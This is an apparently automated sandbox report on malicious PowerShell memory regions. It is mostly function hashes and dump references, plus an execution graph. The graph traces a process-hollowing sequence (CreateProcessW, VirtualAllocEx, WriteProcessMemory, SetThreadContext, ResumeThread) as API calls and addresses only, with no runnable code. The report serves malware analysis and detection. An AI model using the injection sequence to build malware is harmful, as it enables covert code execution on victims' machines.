                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_308d000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3f3bbf667f4fd205b004cca8330f12db6c7c0d5d2c504d31e820fdfce7afefe7
                                                                                                                                                                                                                                  • Instruction ID: 6d6979fc2a7c1875e563b621c6dd05e7e0b8666d5bb969946ff55caafa10a02c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f3bbf667f4fd205b004cca8330f12db6c7c0d5d2c504d31e820fdfce7afefe7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3401F771406304ABE710AF25DC80B67FBD8EF41624F08C659DD880A282C3799441CEB2
                                                                                                                                                                                                                                  Function 0308D007 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1587216124.000000000308D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0308D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_308d000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c9eb947f76359def08322c938c299a42ba16b42766dab4fe020d5c7a85211398
                                                                                                                                                                                                                                  • Instruction ID: d9fda4b5f1fd75394a932c50ae9295c54a2c14caf33be6efeeaa4dcb71de3646
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9eb947f76359def08322c938c299a42ba16b42766dab4fe020d5c7a85211398
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0901ED7140E3C49FE7128B259D94B52BFB89F47224F1D81DBD9888F1A3C2695845CB72

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 07781C10 Relevance: .6, Instructions: 581COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1481305550.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1f184ae753d011f0013c74de49662260d6a03304179747b1dad56d18dabb2f9c
                                                                                                                                                                                                                                  • Instruction ID: c06484007503262cdf823ab9c3e1532d3bb2a88a61ecddf28e2975e977573040
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f184ae753d011f0013c74de49662260d6a03304179747b1dad56d18dabb2f9c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A128DB17443198FDB55AB68C81076A7BA2AFC2251F64C4BFD506DF282DB31CD42C7A2
                                                                                                                                                                                                                                  Function 048829F0 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476585480.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_4880000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 09c8e5902bf915d1551e151f06ec429236cbdf9299580d91c68322439f931e37
                                                                                                                                                                                                                                  • Instruction ID: 374a5e24063ae19c637cac3f8417c6e12948832814c1f0a8f092061dadfcb066
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09c8e5902bf915d1551e151f06ec429236cbdf9299580d91c68322439f931e37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9916C74A00605CFCB15DF58C494AAAFBB1FF88310B258A99D815EB7A5C736FC51CBA0
                                                                                                                                                                                                                                  Function 07781BF2 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1481305550.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b0120d02198e9872698fb1f21427721d99567ec627028baa0b7000f5a0857988
                                                                                                                                                                                                                                  • Instruction ID: 48be2b12e76461155b8c6ae0ae28e68b5144427c361ce272a3b4f48d196bcc6b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0120d02198e9872698fb1f21427721d99567ec627028baa0b7000f5a0857988
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 024136F1A8030ACFDB55AF15C540B6977B2AF85284B94C8AED905DF245D731CD42C7B2
                                                                                                                                                                                                                                  Function 04884C20 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476585480.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_4880000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e885b7a86db3b832dcb8f6ffae54f794decc0ff7c4f56b5e944ace82212ea17c
                                                                                                                                                                                                                                  • Instruction ID: 6d0398af8f09f225a7a5bdd6caa720965a8c999a69e9589cf3315ce996874e4d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e885b7a86db3b832dcb8f6ffae54f794decc0ff7c4f56b5e944ace82212ea17c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0741E5759093959FD702DF6CD8A47DABFB4BF46204F0544CAC085DF262DB34A805CBA6
                                                                                                                                                                                                                                  Function 04882B00 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476585480.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_4880000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e705d3760f881377971f6e001c05c84b5d9796c7b3a29fd6a51ce11abfc26d8e
                                                                                                                                                                                                                                  • Instruction ID: 7add501c72381ea4475a9b44c4cc3cc4e305bf84ab8972566db7771bcdeb5f43
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e705d3760f881377971f6e001c05c84b5d9796c7b3a29fd6a51ce11abfc26d8e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2413974A00605DFCB05DF58C598AAAF7B1FF88310B218699D815AB764C736FC51CBA0
                                                                                                                                                                                                                                  Function 04884C10 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476585480.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_4880000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a8d1ffccb5c4932447ac6130b5f642b0b339857cc71a4964289baf0d1b3384f6
                                                                                                                                                                                                                                  • Instruction ID: 4f227d1e3e484a07863f555357ed072c21329665690b0cf0c65d9a3717afd2a7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8d1ffccb5c4932447ac6130b5f642b0b339857cc71a4964289baf0d1b3384f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11212C74A0020ADFCB01DF98D9809AABBB1FF89310B25859AE805EB351D735FC41CBA0
                                                                                                                                                                                                                                  Function 02FBD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476244076.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2fbd000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7a99ddfca876ce443066996e71343b9eea1c2a5a312559d9d8a2273d7d21972e
                                                                                                                                                                                                                                  • Instruction ID: c1565c1134acbd7f4b25cfbcdf2de9c3c72fad116fede7ba78ae548d2b0f5ac8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a99ddfca876ce443066996e71343b9eea1c2a5a312559d9d8a2273d7d21972e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1001F771505344AAE7214A26DC80BA7FBD8EF41AE4F08C059DE080B24AC3799841CAB3
                                                                                                                                                                                                                                  Function 02FBD005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476244076.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2fbd000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: cd8229e0eceecfc60d38ae764e04f2f3a5b0f1a77dc424199f692d850ce1c693
                                                                                                                                                                                                                                  • Instruction ID: 0872fcbd18d76571d1a679946669f403c802bbae6c2e24babbedf0164186bf73
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd8229e0eceecfc60d38ae764e04f2f3a5b0f1a77dc424199f692d850ce1c693
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55015E6140E3C09FD7138B258894BA2BFB4EF43664F1D80DBD9888F1A7C2695849CB72
                                                                                                                                                                                                                                  Function 04882C6B Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476585480.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_4880000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7cb6023cd35ca964767ed3bb599d4ddc0e98b11d9a86d6fe0ad09fe882c50e91
                                                                                                                                                                                                                                  • Instruction ID: 0bcb509d86de6f1a71b078e31d9b15364a2b3d9a7bfcb736694b9d732d486477
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cb6023cd35ca964767ed3bb599d4ddc0e98b11d9a86d6fe0ad09fe882c50e91
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9F03C396001059FDB05DF98D994AEDB772FF88320F208699E524A7250C732F851CB65

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 048820BD Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476585480.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_4880000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 12d76f9539279f02e03d08223f7b0367e20563095604dee160d16866bc7aeaa5
                                                                                                                                                                                                                                  • Instruction ID: 3193b83290bf4c156aca29846f7858e230c7e47fa9cd511f80c4ecb32ede05fe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12d76f9539279f02e03d08223f7b0367e20563095604dee160d16866bc7aeaa5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02310C7640EBC56FC3139B208C6A4997FB0EE13648B0F4ADBC0C5CB5A3D759550AC752
                                                                                                                                                                                                                                  Function 07781270 Relevance: 5.5, Strings: 4, Instructions: 484COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1481305550.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: i$i$i$i
                                                                                                                                                                                                                                  • API String ID: 0-1528663918
                                                                                                                                                                                                                                  • Opcode ID: 6e6613548a1194bc24a4311e4756476ddfad3e2474afa282c3a24f51ea2ffae3
                                                                                                                                                                                                                                  • Instruction ID: 37fbbdbee17a3930e0351986a03a51c8ba3ac964046fc0df2dafb29ca143e27c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e6613548a1194bc24a4311e4756476ddfad3e2474afa282c3a24f51ea2ffae3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DF138B1B442098FDB54AB68D4007AABBE5AFD5360F6884BFD54ACF241DB31CD42C7A1

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 02E6D005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2371442635.0000000002E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E6D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_2e6d000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9004bf2c3ad0ebd896370b4991610b58881ba7cad5676fc88498f3772fd09c8b
                                                                                                                                                                                                                                  • Instruction ID: f14132742e26b6d621717dfcf28771769a332677130cbd36626904caacc94edb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9004bf2c3ad0ebd896370b4991610b58881ba7cad5676fc88498f3772fd09c8b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D501526114E3C09FD7128B258C94B62BFB4DF43668F1DC1DBD8888F1A3C2695845CB72
                                                                                                                                                                                                                                  Function 02E6D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2371442635.0000000002E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E6D000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_2e6d000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 46ab91ad5a32a433cdaee255c3de609dbecd920bc6039cd8f05a9388c4abcf7e
                                                                                                                                                                                                                                  • Instruction ID: 6d32bdb9cc89771d27c43ff4d948a63a523afc8ee5ab039a961b09e0d9d9ab71
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46ab91ad5a32a433cdaee255c3de609dbecd920bc6039cd8f05a9388c4abcf7e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B01F771684344ABEB604A65DC88B77BF98EF816B8F58C05ADC084A242C3789845CAB2
                                                                                                                                                                                                                                  Function 048A3026 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2378767040.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_48a0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8c4edda03a37b09f116caf2dfad73461272bae4f214a369a42176b27e4436699
                                                                                                                                                                                                                                  • Instruction ID: 3776e724ff2b1c2e4c3e2d41b6019b4ba78038c04ce9572a98d1871c20241ffc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c4edda03a37b09f116caf2dfad73461272bae4f214a369a42176b27e4436699
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F0DA35A001059FDB15CF9DD890AEEF7B1FF88324F208159E515A72A1C736ED52CB50

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:8.3%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:115
                                                                                                                                                                                                                                  Total number of Limit Nodes:10
                                                                                                                                                                                                                                  execution_graph 10620 4788cdf 10621 4788cc9 10620->10621 10622 4788d85 10621->10622 10628 4789198 10621->10628 10635 47891a3 10621->10635 10642 47892b0 10621->10642 10649 47892bd 10621->10649 10623 4788ddd 10630 47891a0 10628->10630 10629 47891d7 10629->10623 10630->10629 10656 4789728 10630->10656 10676 47893a5 10630->10676 10696 4789725 10630->10696 10716 4789720 10630->10716 10636 47891a8 10635->10636 10637 47891d7 10636->10637 10638 4789728 7 API calls 10636->10638 10639 4789720 7 API calls 10636->10639 10640 4789725 7 API calls 10636->10640 10641 47893a5 7 API calls 10636->10641 10637->10623 10638->10636 10639->10636 10640->10636 10641->10636 10643 47892ba 10642->10643 10644 47892f1 10642->10644 10643->10644 10645 4789728 7 API calls 10643->10645 10646 4789720 7 API calls 10643->10646 10647 4789725 7 API calls 10643->10647 10648 47893a5 7 API calls 10643->10648 10644->10623 10645->10643 10646->10643 10647->10643 10648->10643 10650 47892cf 10649->10650 10651 47892f1 10650->10651 10652 4789728 7 API calls 10650->10652 10653 4789720 7 API calls 10650->10653 10654 4789725 7 API calls 10650->10654 10655 47893a5 7 API calls 10650->10655 10651->10623 10652->10650 10653->10650 10654->10650 10655->10650 10657 47897a5 10656->10657 10671 4789d20 10657->10671 10736 4788268 10657->10736 10659 4789830 10660 4788274 Wow64SetThreadContext 10659->10660 10659->10671 10661 478989b 10660->10661 10662 47899ae VirtualAllocEx 10661->10662 10661->10671 10663 47899fb 10662->10663 10664 4789a49 VirtualAllocEx 10663->10664 10665 4789a9d 10663->10665 10663->10671 10664->10665 10666 478828c WriteProcessMemory 10665->10666 10665->10671 10667 4789ae7 10666->10667 10668 4789c31 10667->10668 10667->10671 10675 478828c WriteProcessMemory 10667->10675 10669 478828c WriteProcessMemory 10668->10669 10668->10671 10670 4789c5a 10669->10670 10670->10671 10672 4788298 Wow64SetThreadContext 10670->10672 10671->10630 10673 4789ccf 10672->10673 10673->10671 10674 4789ce0 ResumeThread 10673->10674 10674->10671 10675->10667 10677 4789722 10676->10677 10678 4788268 CreateProcessW 10677->10678 10685 4789d20 10677->10685 10679 4789830 10678->10679 10679->10685 10740 4788274 10679->10740 10681 478989b 10682 47899ae VirtualAllocEx 10681->10682 10681->10685 10683 47899fb 10682->10683 10684 4789a49 VirtualAllocEx 10683->10684 10683->10685 10686 4789a9d 10683->10686 10684->10686 10685->10630 10686->10685 10744 478828c 10686->10744 10688 4789ae7 10688->10685 10689 4789c31 10688->10689 10695 478828c WriteProcessMemory 10688->10695 10689->10685 10690 478828c WriteProcessMemory 10689->10690 10691 4789c5a 10690->10691 10691->10685 10748 4788298 10691->10748 10694 4789ce0 ResumeThread 10694->10685 10695->10688 10698 4789728 10696->10698 10697 4788268 CreateProcessW 10699 4789830 10697->10699 10698->10697 10713 4789d20 10698->10713 10700 4788274 Wow64SetThreadContext 10699->10700 10699->10713 10701 478989b 10700->10701 10702 47899ae VirtualAllocEx 10701->10702 10701->10713 10703 47899fb 10702->10703 10704 4789a49 VirtualAllocEx 10703->10704 10705 4789a9d 10703->10705 10703->10713 10704->10705 10706 478828c WriteProcessMemory 10705->10706 10705->10713 10707 4789ae7 10706->10707 10708 4789c31 10707->10708 10707->10713 10715 478828c WriteProcessMemory 10707->10715 10709 478828c WriteProcessMemory 10708->10709 10708->10713 10710 4789c5a 10709->10710 10711 4788298 Wow64SetThreadContext 10710->10711 10710->10713 10712 4789ccf 10711->10712 10712->10713 10714 4789ce0 ResumeThread 10712->10714 10713->10630 10714->10713 10715->10707 10717 4789722 10716->10717 10718 4788268 CreateProcessW 10717->10718 10733 4789d20 10717->10733 10719 4789830 10718->10719 10720 4788274 Wow64SetThreadContext 10719->10720 10719->10733 10721 478989b 10720->10721 10722 47899ae VirtualAllocEx 10721->10722 10721->10733 10723 47899fb 10722->10723 10724 4789a49 VirtualAllocEx 10723->10724 10725 4789a9d 10723->10725 10723->10733 10724->10725 10726 478828c WriteProcessMemory 10725->10726 10725->10733 10727 4789ae7 10726->10727 10728 4789c31 10727->10728 10727->10733 10735 478828c WriteProcessMemory 10727->10735 10729 478828c WriteProcessMemory 10728->10729 10728->10733 10730 4789c5a 10729->10730 10731 4788298 Wow64SetThreadContext 10730->10731 10730->10733 10732 4789ccf 10731->10732 10732->10733 10734 4789ce0 ResumeThread 10732->10734 10733->10630 10734->10733 10735->10727 10737 4789f28 CreateProcessW 10736->10737 10739 478a081 10737->10739 10739->10739 10741 478a168 Wow64SetThreadContext 10740->10741 10743 478a1e2 10741->10743 10743->10681 10745 478a2e0 WriteProcessMemory 10744->10745 10747 478a36b 10745->10747 10747->10688 10749 478a168 Wow64SetThreadContext 10748->10749 10751 4789ccf 10749->10751 10751->10685 10751->10694

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 047893A5 Relevance: 5.3, APIs: 3, Instructions: 821COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 47893a5-47897d9 6 47897df-47897ef 0->6 7 4789f11-4789f26 0->7 10 47897f8 6->10 11 47897f1-47897f6 6->11 13 47897fa-47897fc 10->13 11->13 14 47897fe-4789811 13->14 15 4789813-4789832 call 4788268 13->15 14->15 19 478983b 15->19 20 4789834-4789839 15->20 21 478983d-478983f 19->21 20->21 22 4789845-478985a 21->22 23 4789e87-4789e9a 21->23 26 4789860-4789884 22->26 27 4789e82 22->27 30 4789ea1-4789eb7 23->30 26->30 33 478988a-478989d call 4788274 26->33 27->23 30->7 37 4789eb9-4789ec3 30->37 38 47898a3-47898aa 33->38 39 4789e25-4789e27 33->39 44 4789ece-4789ed0 37->44 45 4789ec5-4789ecc 37->45 40 4789e0b-4789e1e 38->40 41 47898b0-47898ba 38->41 40->39 41->30 43 47898c0-47898dd 41->43 43->27 47 47898e3-47898fd call 4788280 43->47 48 4789ed2-4789ed6 44->48 45->48 55 4789e2c 47->55 56 4789903-478990a 47->56 50 4789ed8 call 47875d4 48->50 51 4789edd-4789eea 48->51 50->51 66 4789ef1-4789f0e 51->66 62 4789e33 55->62 58 4789910-4789919 56->58 59 4789df1-4789e04 56->59 60 478991b-478995f 58->60 61 4789984-478998a 58->61 59->40 69 4789968-4789974 60->69 70 4789961-4789967 60->70 61->27 64 4789990-47899a0 61->64 68 4789e3d 62->68 64->27 75 47899a6-47899f9 VirtualAllocEx 64->75 73 4789e44 68->73 69->62 74 478997a-478997e 69->74 70->69 78 4789e4b 73->78 74->61 77 4789dd7-4789dea 74->77 81 47899fb-4789a01 75->81 82 4789a02-4789a20 75->82 77->59 84 4789e52 78->84 81->82 82->68 83 4789a26-4789a2d 82->83 87 4789a33-4789a3a 83->87 88 4789ab4-4789abb 83->88 91 4789e59 84->91 87->73 89 4789a40-4789a47 87->89 88->78 90 4789ac1-4789ac8 88->90 89->88 92 4789a49-4789a9b VirtualAllocEx 89->92 93 4789dbd-4789dd0 90->93 94 4789ace-4789ae9 call 478828c 90->94 98 4789e63 91->98 95 4789a9d-4789aa3 92->95 96 4789aa4-4789aae 92->96 93->77 94->84 101 4789aef-4789af6 94->101 95->96 96->88 102 4789e6a 98->102 104 4789afc-4789b05 101->104 105 4789da3-4789db6 101->105 108 4789e71 102->108 104->27 107 4789b0b-4789b11 104->107 105->93 107->27 109 4789b17-4789b22 107->109 111 4789e7b 108->111 109->27 114 4789b28-4789b2e 109->114 111->27 115 4789c31-4789c42 114->115 116 4789b34-4789b39 114->116 115->27 119 4789c48-4789c5c call 478828c 115->119 116->27 117 4789b3f-4789b52 116->117 117->27 122 4789b58-4789b6b 117->122 119->102 124 4789c62-4789c69 119->124 122->27 128 4789b71-4789b86 122->128 126 4789d6f-4789d82 124->126 127 4789c6f-4789c75 124->127 143 4789d89-4789d9c 126->143 127->27 129 4789c7b-4789c8c 127->129 128->91 132 4789b8c-4789b90 128->132 129->108 137 4789c92-4789c96 129->137 134 4789b96-4789b9f 132->134 135 4789c17-4789c1a 132->135 134->27 138 4789ba5-4789ba8 134->138 135->27 141 4789c20-4789c23 135->141 139 4789c98-4789c9b 137->139 140 4789ca1-4789ca9 137->140 138->27 142 4789bae-4789bde 138->142 139->140 140->27 144 4789caf-4789cb9 140->144 141->27 145 4789c29-4789c2b 141->145 142->27 156 4789be4-4789bfd call 478828c 142->156 143->105 144->30 146 4789cbf-4789cd1 call 4788298 144->146 145->115 145->116 146->111 151 4789cd7-4789cde 146->151 154 4789d3b-4789d4e 151->154 155 4789ce0-4789d1e ResumeThread 151->155 160 4789d55-4789d68 154->160 157 4789d20-4789d26 155->157 158 4789d27-4789d34 155->158 163 4789c02-4789c04 156->163 157->158 158->160 161 4789d36-4789eec 158->161 160->126 161->66 163->98 166 4789c0a-4789c11 163->166 166->135 166->143
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d3abd63e16eba42d38691cc9ffa1d85dcf51b6f3d11799ea93127e3770373b47
                                                                                                                                                                                                                                  • Instruction ID: 33529b73babba9094523d23747ca98fe0841f69fa3b0eb7125e638ef833f65b3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3abd63e16eba42d38691cc9ffa1d85dcf51b6f3d11799ea93127e3770373b47
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CF184B1A40218CFEB20DF75CC44BA9BBB6AF85344F1481ADD649A7391DB70AD84CF51
